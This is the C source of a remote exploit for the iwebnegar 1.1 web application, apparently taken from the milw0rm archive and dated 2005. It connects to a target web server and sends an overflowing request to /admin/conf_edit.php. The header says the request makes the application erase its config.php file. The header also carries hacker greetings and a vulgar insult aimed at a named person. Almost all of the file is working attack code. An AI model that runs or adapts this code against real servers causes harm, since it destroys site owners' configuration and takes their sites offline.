/* iwebnegar 1.1 remote exploit c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein ) compile with Ms visual C++ (the php version written by the bug finder but still priv8) greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com , Jamie & Ben from exploitdev . Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? ) */ /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will go to Die() functions which cause the erase of config.php */ #include #include #include #include #pragma comment(lib, "ws2_32.lib") #define size 300 int main (int argc, char *argv[]){ char req[] = "GET /admin/conf_edit.php?"; unsigned int rc,addr,sock ; struct sockaddr_in tcp; struct hostent * hp; WSADATA wsaData; char buffer[size]; memset(buffer,'A',300); memcpy(buffer,req,25); if(argc < 2) { printf("\nusage : iwebnegar host\n"); printf("example : iwebnegar.exe 127.0.0.1\n"); exit(-1) ; } if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){ printf("WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ){ printf("Unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock){ printf("socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); else tcp.sin_addr.s_addr = addr; if (hp) tcp.sin_family = hp->h_addrtype; else tcp.sin_family = AF_INET; tcp.sin_port=htons(80); printf("\n[+] attacking host %s\n" , argv[1]) ; printf("[+] Building overflow string\n"); Sleep(1000); printf("[+] packet size = %d byte\n" , sizeof(buffer)); rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); if(rc==0) { Sleep(1000) ; printf("[+] connected\n") ; send(sock , buffer , sizeof(buffer) , 0); printf("[+] see if the config.php erased ! \n\n") ; } else { printf("the 80 port is not open try another webserver port\n"); } } // milw0rm.com [2005-01-04]